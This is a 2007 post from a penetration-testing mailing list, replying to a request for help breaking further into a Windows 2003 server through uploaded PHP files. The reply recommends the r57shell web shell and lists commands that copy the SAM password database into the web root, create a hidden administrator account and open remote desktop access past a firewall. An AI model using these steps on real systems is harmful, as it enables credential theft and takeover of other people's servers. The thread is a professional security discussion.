Penetration Testing mailing list archives
Re: PHP Exploitation
From: "DokFLeed" <dokfleed () dokfleed net>
Date: Sun, 25 Nov 2007 11:12:24 +0400
I assume its for the good cause, and you are authorized to do so ?! Upload this to the server http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46 encoded for Zend Optimizer Or http://no.spam.ee/~tonu/phpshell/r57shell.txt Try the following commands: ===================== 1) To see whats running on system tasklist -SVC 2) To get a copy of the sam database copy C:\windows\repair\sam C:\www\sam.txt http://hostname/sam.txt 3) To add new user with username tested123 & password tested123net user tested123 tested123 /add /active:yes /expires:never /passwordchg:yes /passwordreq:yes
4) To make him Administrator net localgroup Administrators tested123 /add 5) Try to RDP to the server , if it is Firewalled!!Download the RDP web front "Remote Desktop Connection Web Connection Software (455 KB)"
Start IIS http://hostname /TSweb/ and log to Localhost remember while testing, your imagination is your limitation:),depending on your phpinfo output none of this might work, so you will have to code around it
Dok Smoke Dope, Eat Soap, Fly Home in a Bubble ==================----- Original Message ----- From: "Danux" <danuxx () gmail com>
To: <pen-test () securityfocus com> Sent: Friday, November 23, 2007 6:29 AM Subject: PHP Exploitation
Hi experts, i need your ideas, By now, i am able to upload php files to a Windows 2003 Server, so i can execute php code like phpinfo, but i cant execute passthru command because of lack of IUSR_MACHINE privileges. I have run some local php bof's without success.Do you have another idea to break into the server through php code uploaded?Cheers!!!!! -- Danux, CISSP Chief Information Security Officer Macula Security Consulting Group www.macula-group.com ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- PHP Exploitation Danux (Nov 24)
- Re: PHP Exploitation DokFLeed (Nov 25)
- Re: PHP Exploitation Danux (Nov 27)
- Re: PHP Exploitation Kish Pent (Nov 25)
- Re: PHP Exploitation Robin Wood (Nov 27)
- Re: PHP Exploitation Danux (Nov 27)
- Message not available
- Re: PHP Exploitation Danux (Nov 29)
- Re: PHP Exploitation Danux (Nov 27)
- Re: PHP Exploitation DokFLeed (Nov 25)